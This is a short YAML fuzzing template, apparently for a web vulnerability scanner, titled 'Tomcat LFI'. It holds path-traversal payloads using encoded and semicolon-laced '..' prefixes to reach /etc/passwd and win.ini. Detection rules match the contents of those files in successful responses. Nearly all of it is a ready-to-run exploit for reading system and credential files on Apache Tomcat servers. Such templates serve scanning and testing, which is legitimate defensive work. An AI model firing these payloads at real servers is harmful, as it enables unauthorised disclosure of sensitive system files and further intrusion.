id: tomcat-lfi
type: fuzz
info:
  name: Tomcat LFI
  risk: High

# params:
#   - root: '{{.BaseURL}}/'

variables:
  - prefix: |
      ..
      ..;
      ..%3B
      ..%3B
      ..%2f
      ..%2f
      %2e%2e
  - lfi: |
      win.ini
      /etc/passwd
payloads:
  - '{{.prefix}}/{{.prefix}}/{{.prefix}}/{{.lfi}}'
  - '{{.prefix}}/{{.prefix}}/{{.prefix}}/{{.prefix}}/{{.prefix}}/{{.prefix}}/{{.lfi}}'

requests:
  - generators:
      - Path("{{.payload}}", "*")
    detections:
      - >-
        StatusCode() == 200 && StringSearch("body", "[fonts]") && StringSearch("body", "[extensions]")
      - >-
        StatusCode() == 200 && StringSearch("body", "root:") && StringSearch("body", "/bin/bash")